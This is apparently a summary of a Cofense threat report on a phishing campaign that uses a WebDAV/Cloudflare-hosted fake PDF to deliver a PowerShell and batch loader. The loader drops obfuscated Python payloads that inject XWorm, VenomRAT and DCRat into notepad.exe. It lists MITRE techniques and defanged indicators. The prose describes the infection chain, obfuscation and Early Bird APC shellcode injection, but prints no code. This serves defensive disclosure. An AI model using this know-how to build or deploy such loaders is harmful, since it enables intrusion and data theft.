Keypoints
- Phishing emails impersonate a customer service request and use urgent language to trick recipients into clicking a malicious link.
- A downloaded internet shortcut (file://) connects to a WebDAV service hosted through Cloudflare to present a fake “PDF” that is actually a PowerShell script.
- The PowerShell script downloads and runs an obfuscated batch (corn.bat), which in turn fetches a ZIP that unpacks Python payloads placed in a hidden Python folder in AppData/Roaming.
- Batch files are obfuscated with BatchShield and Python scripts are obfuscated with KRAMER to evade detection and slow analysis.
- Modular Python payloads (xw.py, xo.py, ch.py) run via update.bat and use Early Bird APC process injection to execute shellcode in spawned notepad.exe processes, deploying XWorm, VenomRAT, and DCRat.
- XWorm collects system, account, and browser data, logs keystrokes, attempts privilege escalation, persists via startup entries, and exfiltrates data over an encrypted C2 channel.
- Cofense recommends strengthening user email awareness and reporting suspicious attachments or irregular URLs to reduce the chance of initial compromise.
MITRE Techniques
- [T1059.001] Command and Scripting Interpreter: PowerShell – Used to execute silent PowerShell commands that download and run remote batch scripts ( ‘The RATLoader will execute silent PowerShell commands.’ )
- [T1566] Phishing – The campaign’s initial access vector is a deceptive phishing email ( ‘The Initial infection vector noted in our investigation is an impersonal phishing email.’ )
- [T1204] User Execution: Malicious Link/Malicious File – Victims are directed to a malicious URL in the email which pulls the initial payload ( ‘Initial Payload is pulled using a malicious URL present on the phishing email.’ )
- [T1140] Deobfuscate/Decode Files or Information – The delivered batch file is heavily obfuscated to hinder detection and analysis ( ‘The initial .bat file is heavily obfuscated to prevent detection by automated systems and to slow analysis.’ )
- [T1059.006] Command and Scripting Interpreter: Python – The ZIP includes Python dependencies and scripts used to run the RAT payloads ( ‘The Python dependencies needed for execution are included in the malicious .zip file.’ )
- [T1057] Process Discovery – XWorm queries running processes on the victim to gather system information ( ‘XWorm will pull system information about running programs.’ )
- [T1087] Account Discovery – XWorm enumerates accounts present on the machine ( ‘XWorm will pull account information present on the victim machine.’ )
- [T1217] Browser Information Discovery – XWorm harvests browser-stored information for exfiltration ( ‘XWorm will pull information present in the browser and store it for exfiltration.’ )
- [T1056.001] Input Capture: Keylogging – XWorm records user keystrokes and other interactions for collection ( ‘User interactions with keyboards and other peripherals are logged and stored for exfiltration by XWorm.’ )
- [T1068] Privilege Escalation – XWorm attempts to bypass controls to obtain administrator privileges ( ‘XWorm will attempt to bypass account controls and give itself administrator access.’ )
- [T1547] Boot or Logon AutoStart Execution – XWorm adds itself to startup entries to maintain persistence ( ‘XWorm will add itself to start-up programs.’ )
- [T1041] Exfiltration Over C2 Channel – Collected data is sent back to the actor over an encrypted C2 connection ( ‘XWorm will exfiltrate all collected information over an encrypted C2 connection.’ )
Indicators of Compromise
- [URL] Delivery and staging – hXXps://principles-yours-respected-skirt[.]trycloudflare[.]com/, hXXps://dl[.]dropboxusercontent[.]com/scl/fi/uc4m6iiv8h3raopsr6xd0/RE019290049022PDF.zip
- [URL] WebDAV shortcut – file://puzzle-photographers-nitrogen-rod[.]trycloudflare[.]com@SSL/DavWWWRoot/DE (used to present the fake “PDF”)
- [IP Address] Hosting infrastructure – 104.16.231.132, 162.125.3.15
- [File Name] Delivered artifacts – corn.zip, RE019290049022PDF.zip, update.bat, corn.bat, xw.py, xo.py, ch.py
- [Hash] Example file hashes – corn.zip MD5: fa30434fcbe067ad524ca1c00dcbca01; update.bat MD5: ba9d0ceb4bef463f86099709235d9a0e; and multiple other SHA256/MD5 hashes listed in the report
The Cofense Phishing Defense Center uncovered a multi-stage phishing campaign that abused WebDAV and cloud tunneling to trick recipients into downloading what appeared to be an invoice PDF but was actually a scripted loader. Attackers sent convincing, urgent emails impersonating a customer request; the message contained a URL that delivered an internet shortcut. When opened, that shortcut connected to a Cloudflare-backed WebDAV service and exposed a network folder view where a “PDF” was presented. Instead of a document, the file was a PowerShell script that used Invoke-Expression to execute remotely-hosted code and leveraged directory traversal and hidden-window flags to conceal activity.
The PowerShell “PDF” caused the victim’s browser (msedge.exe) to fetch an obfuscated batch file named corn.bat. Corn.bat was obfuscated with BatchShield, replacing readable commands and variables to impede detection and analysis. Once deobfuscated, the batch searches the user’s Downloads folder for a PDF, opens it to appear benign, and then downloads a ZIP (the Python 312 payload) into a hidden Python folder under AppData/Roaming. The batch uses PowerShell’s Invoke-WebRequest inside a try/catch block to reliably retrieve the ZIP from a Cloudflare-hosted URL.
Inside the extracted ZIP, the researchers found standard Python dependencies alongside three primary payload scripts: xw.py, xo.py, and ch.py. An update.bat file orchestrates execution: it ensures a single running instance, restarts itself minimized if necessary, changes to the Python working directory, and runs ch.py (DCRat), ex.py (VenomRAT), and xw.py (XWorm) sequentially before closing the command window. Each Python payload had been obfuscated with the open-source KRAMER tool to complicate static analysis.
At runtime, each Python script spawns a separate notepad.exe process and performs Early Bird APC (asynchronous procedure call) injection: the loader creates a new process and injects decrypted shellcode into the process before its thread begins, increasing the chance of evading early-stage antivirus checks. The scripts include an rc4_decrypt routine to decode embedded shellcode, allocate executable memory using ctypes.create_string_buffer, change memory protections via the VirtualProtect API to PAGE_EXECUTE_READWRITE, cast the buffer to a callable, and then transfer execution to the shellcode. Memory inspection revealed outbound connection strings tied to XWorm C2 infrastructure, and YARA matches confirmed XWorm indicators in the xw.py payload. Similarly, ch.py and ex.py injected their own shellcode into separate notepad.exe processes to instantiate DCRat and VenomRAT variants.
Functionally, XWorm within this campaign performs discovery and collection tasks: it enumerates running processes, gathers account and browser information, logs keystrokes, and attempts to elevate privileges and persist by adding startup entries. Collected data is transmitted back to operators over an encrypted command-and-control channel. The campaign’s modular design allows multiple RAT families to be deployed from the same loader framework, each packing its own destructive capabilities and persistence mechanisms.
From the defenders’ perspective, several elements helped this attack succeed: a realistic social engineering lure, use of WebDAV and Cloudflare tunneling to host staging directories, multi-layered obfuscation (BatchShield for batch scripts and KRAMER for Python), and advanced in-memory injection techniques (Early Bird APC). These choices slow analysis, confuse automated detection, and let the actors run multiple payloads within innocuous-looking system processes.
Cofense’s conclusions emphasize that while individual techniques are not novel, their combined, well-orchestrated use raises the campaign’s complexity and impact. The report recommends bolstering user awareness about suspicious emails—especially unexpected ZIP/HTML/Office attachments, unfamiliar URLs, or messages using urgent or unusual language—and encouraging prompt reporting to security teams. Detection and remediation after successful infection are time-consuming and costly; preventing the initial click remains the most effective defense. Training, simulated phishing exercises, and robust reporting workflows can help organizations reduce the risk posed by loaders like PythonRATLoader that deliver XWorm, VenomRAT, DCRat, and other payloads.
Read more: https://cofense.com/blog/pythonratloader-the-proprietor-of-xworm-and-friends